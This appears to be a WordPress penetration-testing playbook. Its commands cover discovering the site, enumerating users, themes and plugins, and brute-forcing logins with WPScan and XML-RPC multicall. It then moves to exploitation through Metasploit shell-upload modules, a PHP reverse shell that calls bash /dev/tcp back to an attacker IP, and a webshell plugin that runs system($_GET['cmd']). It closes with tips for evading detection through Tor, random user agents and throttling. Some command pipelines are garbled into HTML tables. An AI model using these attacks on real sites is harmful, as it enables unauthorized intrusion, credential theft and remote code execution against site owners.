WordPress Penetration Testing

Purpose

Conduct comprehensive security assessments of WordPress installations including enumeration of users, themes, and plugins, vulnerability scanning, credential attacks, and exploitation techniques. WordPress powers approximately 35% of websites, making it a critical target for security testing.

Prerequisites

Required Tools

WPScan (pre-installed in Kali Linux)

Metasploit Framework

Burp Suite or OWASP ZAP

Nmap for initial discovery

cURL or wget

Required Knowledge

WordPress architecture and structure

Web application testing fundamentals

HTTP protocol understanding

Common web vulnerabilities (OWASP Top 10)

Outputs and Deliverables

WordPress Enumeration Report - Version, themes, plugins, users

Vulnerability Assessment - Identified CVEs and misconfigurations

Credential Assessment - Weak password findings

Exploitation Proof - Shell access documentation

Core Workflow

Phase 1: WordPress Discovery

Identify WordPress installations:

# Check for WordPress indicators
<div class="overflow-x-auto my-6"><table class="min-w-full divide-y divide-border border border-border"><thead><tr><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">curl -s http://target.com</th><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">grep -i wordpress</th></tr></thead><tbody class="divide-y divide-border"><tr><td class="px-4 py-2 text-sm text-foreground">curl -s http://target.com</td><td class="px-4 py-2 text-sm text-foreground">grep -i &quot;wp-includes&quot;</td></tr></tbody></table></div>
Check common WordPress paths

curl -I http://target.com/wp-login.php
curl -I http://target.com/wp-admin/
curl -I http://target.com/wp-content/
curl -I http://target.com/xmlrpc.php
Check meta generator tag

curl -s http://target.com | grep "generator"
Nmap WordPress detection

nmap -p 80,443 --script http-wordpress-enum target.com

Key WordPress files and directories:

/wp-admin/ - Admin dashboard

/wp-login.php - Login page

/wp-content/ - Themes, plugins, uploads

/wp-includes/ - Core files

/xmlrpc.php - XML-RPC interface

/wp-config.php - Configuration (not accessible if secure)

/readme.html - Version information

Phase 2: Basic WPScan Enumeration

Comprehensive WordPress scanning with WPScan:

# Basic scan
wpscan --url http://target.com/wordpress/
With API token (for vulnerability data)

wpscan --url http://target.com --api-token YOUR_API_TOKEN
Aggressive detection mode

wpscan --url http://target.com --detection-mode aggressive
Output to file

wpscan --url http://target.com -o results.txt
JSON output

wpscan --url http://target.com -f json -o results.json
Verbose output

wpscan --url http://target.com -v

Phase 3: WordPress Version Detection

Identify WordPress version:

# WPScan version detection
wpscan --url http://target.com
Manual version checks

<div class="overflow-x-auto my-6"><table class="min-w-full divide-y divide-border border border-border"><thead><tr><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">curl -s http://target.com/readme.html</th><th class="px-4 py-2 text-left text-sm font-semibold text-foreground bg-muted/50">grep -i version</th></tr></thead><tbody class="divide-y divide-border"><tr><td class="px-4 py-2 text-sm text-foreground">curl -s http://target.com</td><td class="px-4 py-2 text-sm text-foreground">grep &quot;?ver=&quot;</td></tr></tbody></table></div>
Check meta generator

curl -s http://target.com | grep 'name="generator"'
Check RSS feeds

curl -s http://target.com/feed/
curl -s http://target.com/comments/feed/

Version sources:

Meta generator tag in HTML

readme.html file

RSS/Atom feeds

JavaScript/CSS file versions

Phase 4: Theme Enumeration

Identify installed themes:

# Enumerate all themes
wpscan --url http://target.com -e at
Enumerate vulnerable themes only

wpscan --url http://target.com -e vt
Theme enumeration with detection mode

wpscan --url http://target.com -e at --plugins-detection aggressive
Manual theme detection

curl -s http://target.com | grep "wp-content/themes/"
curl -s http://target.com/wp-content/themes/

Theme vulnerability checks:

# Search for theme exploits
searchsploit wordpress theme <theme_name>
Check theme version

curl -s http://target.com/wp-content/themes/<theme>/style.css | grep -i version
curl -s http://target.com/wp-content/themes/<theme>/readme.txt

Phase 5: Plugin Enumeration

Identify installed plugins:

# Enumerate all plugins
wpscan --url http://target.com -e ap
Enumerate vulnerable plugins only

wpscan --url http://target.com -e vp
Aggressive plugin detection

wpscan --url http://target.com -e ap --plugins-detection aggressive
Mixed detection mode

wpscan --url http://target.com -e ap --plugins-detection mixed
Manual plugin discovery

curl -s http://target.com | grep "wp-content/plugins/"
curl -s http://target.com/wp-content/plugins/

Common vulnerable plugins to check:

# Search for plugin exploits
searchsploit wordpress plugin <plugin_name>
searchsploit wordpress mail-masta
searchsploit wordpress slideshow gallery
searchsploit wordpress reflex gallery
Check plugin version

curl -s http://target.com/wp-content/plugins/<plugin>/readme.txt

Phase 6: User Enumeration

Discover WordPress users:

# WPScan user enumeration
wpscan --url http://target.com -e u
Enumerate specific number of users

wpscan --url http://target.com -e u1-100
Author ID enumeration (manual)

for i in {1..20}; do
    curl -s "http://target.com/?author=$i" | grep -o 'author/[^/]/'
done
JSON API user enumeration (if enabled)

curl -s http://target.com/wp-json/wp/v2/users
REST API user enumeration

curl -s http://target.com/wp-json/wp/v2/users?per_page=100
Login error enumeration

curl -X POST -d "log=admin&pwd=wrongpass" http://target.com/wp-login.php

Phase 7: Comprehensive Enumeration

Run all enumeration modules:

# Enumerate everything
wpscan --url http://target.com -e at -e ap -e u
Alternative comprehensive scan

wpscan --url http://target.com -e vp,vt,u,cb,dbe
Enumeration flags:

at - All themes

vt - Vulnerable themes

ap - All plugins

vp - Vulnerable plugins

u  - Users (1-10)

cb - Config backups

dbe - Database exports
Full aggressive enumeration

wpscan --url http://target.com -e at,ap,u,cb,dbe \
    --detection-mode aggressive \
    --plugins-detection aggressive

Phase 8: Password Attacks

Brute-force WordPress credentials:

# Single user brute-force
wpscan --url http://target.com -U admin -P /usr/share/wordlists/rockyou.txt
Multiple users from file

wpscan --url http://target.com -U users.txt -P /usr/share/wordlists/rockyou.txt
With password attack threads

wpscan --url http://target.com -U admin -P passwords.txt --password-attack wp-login -t 50
XML-RPC brute-force (faster, may bypass protection)

wpscan --url http://target.com -U admin -P passwords.txt --password-attack xmlrpc
Brute-force with API limiting

wpscan --url http://target.com -U admin -P passwords.txt --throttle 500
Create targeted wordlist

cewl http://target.com -w wordlist.txt
wpscan --url http://target.com -U admin -P wordlist.txt

Password attack methods:

wp-login - Standard login form

xmlrpc - XML-RPC multicall (faster)

xmlrpc-multicall - Multiple passwords per request
Phase 9: Vulnerability Exploitation
Metasploit Shell Upload
After obtaining credentials:
# Start Metasploit msfconsole Admin shell upload use exploit/unix/webapp/wp_admin_shell_upload set RHOSTS target.com set USERNAME admin set PASSWORD jessica set TARGETURI /wordpress set LHOST <your_ip> exploit
Plugin Exploitation
# Slideshow Gallery exploit use exploit/unix/webapp/wp_slideshowgallery_upload set RHOSTS target.com set TARGETURI /wordpress set USERNAME admin set PASSWORD jessica set LHOST <your_ip> exploit Search for WordPress exploits search type:exploit platform:php wordpress
Manual Exploitation
Theme/plugin editor (with admin access):
// Navigate to Appearance > Theme Editor // Edit 404.php or functions.php // Add PHP reverse shell: <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>
// Or use weevely backdoor // Access via: http://target.com/wp-content/themes/theme_name/404.php
Plugin upload method:

# Create malicious plugin
cat > malicious.php << 'EOF'
<?php
/
Plugin Name: Malicious Plugin
Description: Security Testing
Version: 1.0
*/
if(isset($_GET['cmd'])){
    system($_GET['cmd']);
}
?>
EOF
Zip and upload via Plugins > Add New > Upload Plugin

zip malicious.zip malicious.php
Access webshell

curl "http://target.com/wp-content/plugins/malicious/malicious.php?cmd=id"

Phase 10: Advanced Techniques

XML-RPC Exploitation

# Check if XML-RPC is enabled
curl -X POST http://target.com/xmlrpc.php
List available methods

curl -X POST -d '<?xml version="1.0"?><methodCall><methodName>system.listMethods</methodName></methodCall>' http://target.com/xmlrpc.php
Brute-force via XML-RPC multicall

cat > xmlrpc_brute.xml << 'EOF'
<?xml version="1.0"?>
<methodCall>
<methodName>system.multicall</methodName>
<params>
<param><value><array><data>
<value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>admin</string></value>
<value><string>password1</string></value>
</data></array></value></member>
</struct></value>
<value><struct>
<member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
<member><name>params</name><value><array><data>
<value><string>admin</string></value>
<value><string>password2</string></value>
</data></array></value></member>
</struct></value>
</data></array></value></param>
</params>
</methodCall>
EOFcurl -X POST -d @xmlrpc_brute.xml http://target.com/xmlrpc.php

Scanning Through Proxy

# Use Tor proxy
wpscan --url http://target.com --proxy socks5://127.0.0.1:9050
HTTP proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080
Burp Suite proxy

wpscan --url http://target.com --proxy http://127.0.0.1:8080 --disable-tls-checks

HTTP Authentication

# Basic authentication
wpscan --url http://target.com --http-auth admin:password
Force SSL/TLS

wpscan --url https://target.com --disable-tls-checks

Quick Reference

WPScan Enumeration Flags

Flag	Description
`-e at`	All themes
`-e vt`	Vulnerable themes
`-e ap`	All plugins
`-e vp`	Vulnerable plugins
`-e u`	Users (1-10)
`-e cb`	Config backups
`-e dbe`	Database exports

Common WordPress Paths

Path	Purpose
`/wp-admin/`	Admin dashboard
`/wp-login.php`	Login page
`/wp-content/uploads/`	User uploads
`/wp-includes/`	Core files
`/xmlrpc.php`	XML-RPC API
`/wp-json/`	REST API

WPScan Command Examples

Purpose	Command
Basic scan	`wpscan --url http://target.com`
All enumeration	`wpscan --url http://target.com -e at,ap,u`
Password attack	`wpscan --url http://target.com -U admin -P pass.txt`
Aggressive	`wpscan --url http://target.com --detection-mode aggressive`

Constraints and Limitations

Legal Considerations

Obtain written authorization before testing

Stay within defined scope

Document all testing activities

Follow responsible disclosure

Technical Limitations

WAF may block scanning

Rate limiting may prevent brute-force

Some plugins may have false negatives

XML-RPC may be disabled

Detection Evasion

Use random user agents: --random-user-agent

Throttle requests: --throttle 1000

Use proxy rotation

Avoid aggressive modes on monitored sites

Troubleshooting

WPScan Shows No Vulnerabilities

Solutions:

Use API token for vulnerability database

Try aggressive detection mode

Check for WAF blocking scans

Verify WordPress is actually installed

Brute-Force Blocked

Solutions:

Use XML-RPC method instead of wp-login

Add throttling: --throttle 500

Use different user agents

Check for IP blocking/fail2ban

Cannot Access Admin Panel

Solutions:

Verify credentials are correct

Check for two-factor authentication

Look for IP whitelist restrictions

Check for login URL changes (security plugins)